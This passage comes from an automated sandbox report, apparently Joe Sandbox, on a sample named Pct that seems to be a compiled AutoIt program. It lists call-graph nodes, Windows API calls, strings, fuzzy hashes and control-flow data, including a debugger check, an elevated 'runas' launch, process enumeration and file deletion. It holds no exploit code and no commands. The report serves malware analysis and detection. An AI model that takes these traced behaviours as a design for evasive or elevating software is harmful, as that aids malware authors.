116458->116562 116461 be312d _W_store_winword 60 API calls 116462 bd4fae 116461->116462 116463 c10a54 116462->116463 116464 bd4fb8 116462->116464 116466 bd55bc 59 API calls 116463->116466 116465 be312d _W_store_winword 60 API calls 116464->116465 116468 bd4fc3 116465->116468 116467 c10a68 116466->116467 116470 bd55bc 59 API calls 116467->116470 116468->116467 116469 bd4fcd 116468->116469 116471 be312d _W_store_winword 60 API calls 116469->116471 116472 c10a84 116470->116472 116473 bd4fd8 116471->116473 116475 be00cf 61 API calls 116472->116475 116473->116472 116474 bd4fe2 116473->116474 116476 be312d _W_store_winword 60 API calls 116474->116476 116477 c10aa7 116475->116477 116478 bd4fed 116476->116478 116479 bd55bc 59 API calls 116477->116479 116480 c10ad0 116478->116480 116481 bd4ff7 116478->116481 116483 c10ab3 116479->116483 116482 bd55bc 59 API calls 116480->116482 116484 bd501b 116481->116484 116487 bd1c9c 59 API calls 116481->116487 116485 c10aee 116482->116485 116486 bd1c9c 59 API calls 116483->116486 116488 bc47be 59 API calls 116484->116488 116489 bd1c9c 59 API calls 116485->116489 116490 c10ac1 116486->116490 116491 bd500e 116487->116491 116492 bd502a 116488->116492 116493 c10afc 116489->116493 116494 bd55bc 59 API calls 116490->116494 116495 bd55bc 59 API calls 116491->116495 116496 bc4540 59 API calls 116492->116496 116497 bd55bc 59 API calls 116493->116497 116494->116480 116495->116484 116498 bd5038 116496->116498 116499 c10b0b 116497->116499 116500 bc43d0 59 API calls 116498->116500 116499->116499 116501 bd5055 116500->116501 116502 bc477a 59 API calls 116501->116502 116503 bc43d0 59 API calls 116501->116503 116504 bd55bc 59 API calls 116501->116504 116505 bd509b Mailbox 116501->116505 116502->116501 116503->116501 116504->116501 116505->116388 116507 bd31cc __ftell_nolock 116506->116507 116508 c10314 _memset 116507->116508 116509 bd31e5 116507->116509 116511 c10330 GetOpenFileNameW 116508->116511 116510 be0284 60 API calls 116509->116510 116512 bd31ee 116510->116512 116513 c1037f 116511->116513 116568 be09c5 116512->116568 116515 bd1821 59 API calls 116513->116515 116517 c10394 116515->116517 116517->116517 116519 bd3203 116586 bd278a 116519->116586 116546->116396 116549 bd542d __ftell_nolock 116548->116549 116550 bd1821 59 API calls 116549->116550 116561 bd5590 Mailbox 116549->116561 116552 bd545f 116550->116552 116551 bd1609 59 API calls 116551->116552 116552->116551 116559 bd5495 Mailbox 116552->116559 116553 bd1609 59 API calls 116553->116559 116554 bd5563 116555 bd1a36 59 API calls 116554->116555 116554->116561 116556 bd5584 116555->116556 116558 bd4c94 59 API calls 116556->116558 116557 bd1a36 59 API calls 116557->116559 116558->116561 116559->116553 116559->116554 116559->116557 116560 bd4c94 59 API calls 116559->116560 116559->116561 116560->116559 116561->116442 116563 bd55df 116562->116563 116564 bd55c6 116562->116564 116566 bd1821 59 API calls 116563->116566 116565 bd1c9c 59 API calls 116564->116565 116567 bd4fa0 116565->116567 116566->116567 116567->116461 116569 bf1b70 __ftell_nolock 116568->116569 116570 be09d2 GetLongPathNameW 116569->116570 116571 bd1821 59 API calls 116570->116571 116572 bd31f7 116571->116572 116573 bd2f3d 116572->116573 116574 bd1207 59 API calls 116573->116574 116575 bd2f4f 116574->116575 116576 be0284 60 API calls 116575->116576 116577 bd2f5a 116576->116577 116578 bd2f65 116577->116578 116581 c10177 116577->116581 116580 bd4c94 59 API calls 116578->116580 116582 bd2f71 116580->116582 116583 c10191 116581->116583 116626 bd151f 61 API calls 116581->116626 116620 bc1307 116582->116620 116585 bd2f84 Mailbox 116585->116519 116627 bd49c2 116586->116627 116621 bc1319 116620->116621 116625 bc1338 _memmove 116620->116625 116623 be0fe6 Mailbox 59 API calls 116621->116623 116622 be0fe6 Mailbox 59 API calls 116624 bc134f 116622->116624 116623->116625 116624->116585 116625->116622 116626->116581 116811 bd4b29 116627->116811 116632 bd49ed LoadLibraryExW 116821 bd4ade 116632->116821 116633 c108bb 116634 bd4a2f 84 API calls 116633->116634 116636 c108c2 116634->116636 116638 bd4ade 3 API calls 116636->116638 116640 c108ca 116638->116640 116847 bd4ab2 116640->116847 116641 bd4a14 116641->116640 116642 bd4a20 116641->116642 116643 bd4a2f 84 API calls 116642->116643 116645 bd27af 116643->116645 116648 c108f1 116860 bd4b77 116811->116860 116814 bd4b50 116816 bd49d4 116814->116816 116817 bd4b60 FreeLibrary 116814->116817 116815 bd4b77 2 API calls 116815->116814 116818 be547b 116816->116818 116817->116816 116864 be5490 116818->116864 116820 bd49e1 116820->116632 116820->116633 116945 bd4baa 116821->116945 116824 bd4baa 2 API calls 116827 bd4b03 116824->116827 116825 bd4a05 116828 bd48b0 116825->116828 116826 bd4b15 FreeLibrary 116826->116825 116827->116825 116827->116826 116829 be0fe6 Mailbox 59 API calls 116828->116829 116830 bd48c5 116829->116830 116831 bd433f 59 API calls 116830->116831 116832 bd48d1 _memmove 116831->116832 116833 bd490c 116832->116833 116834 c1080a 116832->116834 116835 bd4a6e 69 API calls 116833->116835 116836 c10817 116834->116836 116954 c29ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 116834->116954 116839 bd4915 116835->116839 116955 c29f5e 95 API calls 116836->116955 116840 c10859 116839->116840 116841 bd4ab2 74 API calls 116839->116841 116844 bd4a8c 85 API calls 116839->116844 116846 bd49a0 116839->116846 116949 bd4a8c 116840->116949 116841->116839 116844->116839 116846->116641 116848 c10945 116847->116848 116849 bd4ac4 116847->116849 117061 be5802 116849->117061 116852 c296c4 117186 c2951a 116852->117186 116854 c296da 116854->116648 116861 bd4b44 116860->116861 116862 bd4b80 LoadLibraryA 116860->116862 116861->116814 116861->116815 116862->116861 116863 bd4b91 GetProcAddress 116862->116863 116863->116861 116865 be549c __setmbcp 116864->116865 116866 be54af 116865->116866 116869 be54e0 116865->116869 116913 be8d58 58 API calls __getptd_noexit 116866->116913 116868 be54b4 116914 be8fe6 9 API calls __write 116868->116914 116883 bf0718 116869->116883 116872 be54e5 116873 be54ee 116872->116873 116874 be54fb 116872->116874 116915 be8d58 58 API calls __getptd_noexit 116873->116915 116876 be5525 116874->116876 116877 be5505 116874->116877 116898 bf0837 116876->116898 116916 be8d58 58 API calls __getptd_noexit 116877->116916 116878 be54bf @_EH4_CallFilterFunc@8 __setmbcp 116878->116820 116884 bf0724 __setmbcp 116883->116884 116885 be9e3b __lock 58 API calls 116884->116885 116895 bf0732 116885->116895 116886 bf07a6 116918 bf082e 116886->116918 116887 bf07ad 116923 be8a4d 58 API calls 2 library calls 116887->116923 116890 bf0823 __setmbcp 116890->116872 116891 bf07b4 116891->116886 116924 bea05b InitializeCriticalSectionAndSpinCount 116891->116924 116892 be9ec3 __mtinitlocknum 58 API calls 116892->116895 116895->116886 116895->116887 116895->116892 116921 be6e7d 59 API calls __lock 116895->116921 116922 be6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 116895->116922 116896 bf07da EnterCriticalSection 116896->116886 116907 bf0857 __wopenfile 116898->116907 116899 bf0871 116929 be8d58 58 API calls __getptd_noexit 116899->116929 116901 bf0a2c 116901->116899 116905 bf0a8f 116901->116905 116902 bf0876 116930 be8fe6 9 API calls __write 116902->116930 116904 be5530 116917 be5552 LeaveCriticalSection LeaveCriticalSection _fseek 116904->116917 116926 bf87d1 116905->116926 116907->116899 116907->116901 116907->116907 116931 be39fb 60 API calls 3 library calls 116907->116931 116909 bf0a25 116909->116901 116932 be39fb 60 API calls 3 library calls 116909->116932 116911 bf0a44 116911->116901 116933 be39fb 60 API calls 3 library calls 116911->116933 116913->116868 116914->116878 116915->116878 116916->116878 116917->116878 116925 be9fa5 LeaveCriticalSection 116918->116925 116920 bf0835 116920->116890 116921->116895 116922->116895 116923->116891 116924->116896 116925->116920 116934 bf7fb5 116926->116934 116929->116902 116930->116904 116931->116909 116932->116911 116933->116901 116937 bf7fc1 __setmbcp 116934->116937 116935 bf7fd7 116936 be8d58 __free_osfhnd 58 API calls 116935->116936 116938 bf7fdc 116936->116938 116937->116935 116939 bf800d 116937->116939 116940 be8fe6 __write 9 API calls 116938->116940 116941 bf807e __wsopen_nolock 109 API calls 116939->116941 116942 bf8029 116941->116942 116943 bf8052 __wsopen_helper LeaveCriticalSection 116942->116943 116946 bd4af7 116945->116946 116947 bd4bb3 LoadLibraryA 116945->116947 116946->116824 116946->116827 116947->116946 116948 bd4bc4 GetProcAddress 116947->116948 116948->116946 116950 c10923 116949->116950 116951 bd4a9b 116949->116951 116956 be5a6d 116951->116956 116954->116836 116955->116839 117064 be581d 117061->117064 117063 bd4ad5 117063->116852 117065 be5829 __setmbcp 117064->117065 117066 be586c 117065->117066 117068 be583f _memset 117065->117068 117076 be5864 __setmbcp 117065->117076 117067 be6e3e __lock_file 59 API calls 117066->117067 117069 be5872 117067->117069 117091 be8d58 58 API calls __getptd_noexit 117068->117091 117077 be563d 117069->117077 117072 be5859 117092 be8fe6 9 API calls __write 117072->117092 117076->117063 117078 be5673 117077->117078 117081 be5658 _memset 117077->117081 117093 be58a6 LeaveCriticalSection LeaveCriticalSection _fseek 117078->117093 117079 be5663 117182 be8d58 58 API calls __getptd_noexit 117079->117182 117081->117078 117081->117079 117083 be56b3 117081->117083 117083->117078 117085 be57c4 _memset 117083->117085 117086 be4906 __fseek_nolock 58 API calls 117083->117086 117094 bf108b 117083->117094 117162 bf0dd7 117083->117162 117184 bf0ef8 58 API calls 4 library calls 117083->117184 117185 be8d58 58 API calls __getptd_noexit 117085->117185 117086->117083 117090 be5668 117183 be8fe6 9 API calls __write 117090->117183 117091->117072 117092->117076 117093->117076 117095 bf10ac 117094->117095 117096 bf10c3 117094->117096 117097 be8d24 __free_osfhnd 58 API calls 117095->117097 117163 bf0de2 117162->117163 117167 bf0df7 117162->117167 117182->117090 117183->117078 117184->117083 117185->117090 117189 be542a GetSystemTimeAsFileTime 117186->117189 117188 c29529 117188->116854 117190 be5458 __aulldiv 117189->117190 117190->117188 117374 bd4d83 117375 bd4dba 117374->117375 117376 bd4dd8 117375->117376 117377 bd4e37 117375->117377 117378 bd4e35 117375->117378 117379 bd4ead PostQuitMessage 117376->117379 117380 bd4de5 117376->117380 117382 bd4e3d 117377->117382 117383 c109c2 117377->117383 117381 bd4e1a DefWindowProcW 117378->117381 117387 bd4e28 117379->117387 117384 c10a35 117380->117384 117385 bd4df0 117380->117385 117381->117387 117388 bd4e65 SetTimer RegisterWindowMessageW 117382->117388 117389 bd4e42 117382->117389 117429 bcc460 10 API calls Mailbox 117383->117429 117432 c22cce 97 API calls _memset 117384->117432 117390 bd4df8 117385->117390 117391 bd4eb7 117385->117391 117388->117387 117392 bd4e8e CreatePopupMenu 117388->117392 117395 c10965 117389->117395 117396 bd4e49 KillTimer 117389->117396 117398 c10a1a 117390->117398 117399 bd4e03 117390->117399 117419 bd5b29 117391->117419 117392->117387 117394 c109e9 117430 bcc483 272 API calls Mailbox 117394->117430 117403 c1096a 117395->117403 117404 c1099e MoveWindow 117395->117404 117397 bd5ac3 Shell_NotifyIconW 117396->117397 117405 bd4e5c 117397->117405 117398->117381 117431 c18854 59 API calls Mailbox 117398->117431 117406 bd4e0e 117399->117406 117407 bd4e9b 117399->117407 117400 c10a47 117400->117381 117400->117387 117408 c1098d SetFocus 117403->117408 117409 c1096e 117403->117409 117404->117387 117426 bc34e4 DeleteObject DestroyWindow Mailbox 117405->117426 117406->117381 117416 bd5ac3 Shell_NotifyIconW 117406->117416 117427 bd5bd7 107 API calls _memset 117407->117427 117408->117387 117409->117406 117410 c10977 117409->117410 117428 bcc460 10 API calls Mailbox 117410->117428 117415 bd4eab 117415->117387 117417 c10a0e 117416->117417 117418 bd59d3 94 API calls 117417->117418 117418->117378 117420 bd5b40 _memset 117419->117420 117421 bd5bc2 117419->117421 117422 bd56f8 87 API calls 117420->117422 117421->117387 117425 bd5b67 117422->117425 117423 bd5bab KillTimer SetTimer 117423->117421 117424 c10d6e Shell_NotifyIconW 117424->117423 117425->117423 117425->117424 117426->117387 117427->117415 117428->117387 117429->117394 117430->117406 117431->117378 117432->117400

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 6CC235A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCAF688,00001000), ref: 6CC235D5
                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC235E0
                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC235FD
                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC2363F
                                                                                                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC2369F
                                                                                                                                                  • __aulldiv.LIBCMT ref: 6CC236E4
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6CC23773
                                                                                                                                                  • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC2377E
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC237BD
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6CC237C4
                                                                                                                                                  • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC237CB
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC23801
                                                                                                                                                  • __aulldiv.LIBCMT ref: 6CC23883
                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC23902
                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC23918
                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC2394C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3830779025.000000006CC21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3830748804.000000006CC20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830852669.000000006CCAE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830875835.000000006CCB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_6cc20000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                  • API String ID: 301339242-3790311718
                                                                                                                                                  • Opcode ID: 4beefb42264f6f66f99be3af24fd980ba7f763234d9a691554eff280fe6e0afe
                                                                                                                                                  • Instruction ID: c5d28db8f31fb233b76978c9533a52be0b6f4c3300fe9a72af5649d728b7c8fa
                                                                                                                                                  • Opcode Fuzzy Hash: 4beefb42264f6f66f99be3af24fd980ba7f763234d9a691554eff280fe6e0afe
                                                                                                                                                  • Instruction Fuzzy Hash: 92B1A371B043009FDB08DF69D85965E77F9FB8A700F098A2EE899D7760E774D8018B91
                                                                                                                                                  Function 00BD5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BD526C
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00BD527E
                                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BD52E6
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                    • Part of subcall function 00BCBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BCBC07
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BD5366
                                                                                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00C10B2E
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C10B66
                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C76D10), ref: 00C10BE9
                                                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00C10BF0
                                                                                                                                                    • Part of subcall function 00BD514C: GetSysColorBrush.USER32(0000000F), ref: 00BD5156
                                                                                                                                                    • Part of subcall function 00BD514C: LoadCursorW.USER32(00000000,00007F00), ref: 00BD5165
                                                                                                                                                    • Part of subcall function 00BD514C: LoadIconW.USER32(00000063), ref: 00BD517C
                                                                                                                                                    • Part of subcall function 00BD514C: LoadIconW.USER32(000000A4), ref: 00BD518E
                                                                                                                                                    • Part of subcall function 00BD514C: LoadIconW.USER32(000000A2), ref: 00BD51A0
                                                                                                                                                    • Part of subcall function 00BD514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BD51C6
                                                                                                                                                    • Part of subcall function 00BD514C: RegisterClassExW.USER32(?), ref: 00BD521C
                                                                                                                                                    • Part of subcall function 00BD50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00C88290,00BD5328), ref: 00BD5109
                                                                                                                                                    • Part of subcall function 00BD50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BD512A
                                                                                                                                                    • Part of subcall function 00BD50DB: ShowWindow.USER32(00000000), ref: 00BD513E
                                                                                                                                                    • Part of subcall function 00BD50DB: ShowWindow.USER32(00000000), ref: 00BD5147
                                                                                                                                                    • Part of subcall function 00BD59D3: _memset.LIBCMT ref: 00BD59F9
                                                                                                                                                    • Part of subcall function 00BD59D3: Shell_NotifyIconW.SHELL32(00000000,?,FFFFFFFF,01702588,00C87A30), ref: 00BD5A9E
                                                                                                                                                  Strings
                                                                                                                                                  • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00C10B28
                                                                                                                                                  • AutoIt, xrefs: 00C10B23
                                                                                                                                                  • runas, xrefs: 00C10BE4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                  • API String ID: 529118366-2030392706
                                                                                                                                                  • Opcode ID: d51de79cc46e843688d7608b81e684af89ff4ec0e2bd55640970fd369db7f018
                                                                                                                                                  • Instruction ID: fb8cff13eb7a26ffbf5f21359c803d37902da629d383c45ed85566898b8c6404
                                                                                                                                                  • Opcode Fuzzy Hash: d51de79cc46e843688d7608b81e684af89ff4ec0e2bd55640970fd369db7f018
                                                                                                                                                  • Instruction Fuzzy Hash: DE511871908248EBCF21EBB4DC55FFDFBB8AB05390F2041E6F451A2262FAB49584D725
                                                                                                                                                  Function 00C24005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD2A58,?,00008000), ref: 00BE02A4
                                                                                                                                                    • Part of subcall function 00C24FEC: GetFileAttributesW.KERNEL32(?,00C23BFE), ref: 00C24FED
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2407C
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C240CC
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C240DD
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C240F4
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C240FD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                  • String ID: \*.*
                                                                                                                                                  • API String ID: 2649000838-1173974218
                                                                                                                                                  • Opcode ID: b5bddc939e42dff897992d1e93ee146b39164ac1724dcf05786f930eb54a3e35
                                                                                                                                                  • Instruction ID: ff595623eb8352e517e8e04480dd2f28d57d03ceaf82b466d81cc6086fa0045c
                                                                                                                                                  • Opcode Fuzzy Hash: b5bddc939e42dff897992d1e93ee146b39164ac1724dcf05786f930eb54a3e35
                                                                                                                                                  • Instruction Fuzzy Hash: 1431AE31018395ABC304EF64D9919AFB7ECBE91301F444E6EF4E192292EB219A49C763
                                                                                                                                                  Function 00BD5D13 Relevance: 9.2, APIs: 6, Instructions: 223COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 942 bd5d13-bd5d73 call bd1207 GetVersionExW call bd1821 947 bd5d79 942->947 948 bd5e78-bd5e7a 942->948 950 bd5d7c-bd5d81 947->950 949 c10fa9-c10fb5 948->949 951 c10fb6-c10fba 949->951 952 bd5e7f-bd5e80 950->952 953 bd5d87 950->953 955 c10fbd-c10fc9 951->955 956 c10fbc 951->956 954 bd5d88-bd5dbf call bd1981 call bd133d 952->954 953->954 964 bd5dc5-bd5dc6 954->964 965 c11098-c1109b 954->965 955->951 958 c10fcb-c10fd0 955->958 956->955 958->950 960 c10fd6-c10fdd 958->960 960->949 962 c10fdf 960->962 966 c10fe4-c10fea 962->966 967 bd5dcc-bd5dcf 964->967 968 c10fef-c10ffa 964->968 970 c110b4-c110b8 965->970 971 c1109d 965->971 969 bd5e00-bd5e17 GetCurrentProcess IsWow64Process 966->969 967->969 977 bd5dd1-bd5def 967->977 978 c11017-c11019 968->978 979 c10ffc-c11002 968->979 974 bd5e1c-bd5e2d 969->974 975 bd5e19 969->975 972 c110a3-c110ac 970->972 973 c110ba-c110c3 970->973 976 c110a0 971->976 972->970 973->976 982 c110c5-c110c8 973->982 983 bd5e2f-bd5e3f call bd55f0 974->983 984 bd5e98-bd5ea2 GetSystemInfo 974->984 975->974 976->972 977->969 985 bd5df1-bd5df7 977->985 980 c1101b-c11027 978->980 981 c1103c-c1103f 978->981 986 c11004-c11007 979->986 987 c1100c-c11012 979->987 989 c11031-c11037 980->989 990 c11029-c1102c 980->990 993 c11041-c11050 981->993 994 c11065-c11068 981->994 982->972 999 bd5e8c-bd5e96 GetSystemInfo 983->999 1000 bd5e41-bd5e4e call bd55f0 983->1000 992 bd5e65-bd5e75 984->992 985->966 988 bd5dfd 985->988 986->969 987->969 988->969 989->969 990->969 995 c11052-c11055 993->995 996 c1105a-c11060 993->996 994->969 998 c1106e-c11083 994->998 995->969 996->969 1001 c11085-c11088 998->1001 1002 c1108d-c11093 998->1002 1003 bd5e56-bd5e5a 999->1003 1007 bd5e85-bd5e8a 1000->1007 1008 bd5e50-bd5e53 1000->1008 1001->969 1002->969 1003->992 1006 bd5e5c-bd5e5f FreeLibrary 1003->1006 1006->992 1007->1008 1008->1003
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00BD5D40
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00C50A18,00000000,00000000,?), ref: 00BD5E07
                                                                                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00BD5E0E
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00BD5E5F
                                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BD5E90
                                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BD5E9C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoProcessSystem$CurrentFreeLibraryVersionWow64_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 551412401-0
                                                                                                                                                  • Opcode ID: e6806bb26d0e627e7319b1292cb9ca5f143d872f21c7069476e2e272fd2e35a5
                                                                                                                                                  • Instruction ID: 59198f8156b7f4dfc4cb66532115976eaead13c234e05a280d1fdb23c4c47e14
                                                                                                                                                  • Opcode Fuzzy Hash: e6806bb26d0e627e7319b1292cb9ca5f143d872f21c7069476e2e272fd2e35a5
                                                                                                                                                  • Instruction Fuzzy Hash: 9591D831949BC0DEC731DB7884515ABFFE5AF2A301B984A9FD0C793701E234A688D769
                                                                                                                                                  Function 00C24148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C2416D
                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C2417B
                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C2419B
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C24245
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                  • Opcode ID: 948842added9be707e0a403be1b9d302d2760d77c2d46ba7897858ac149ccd55
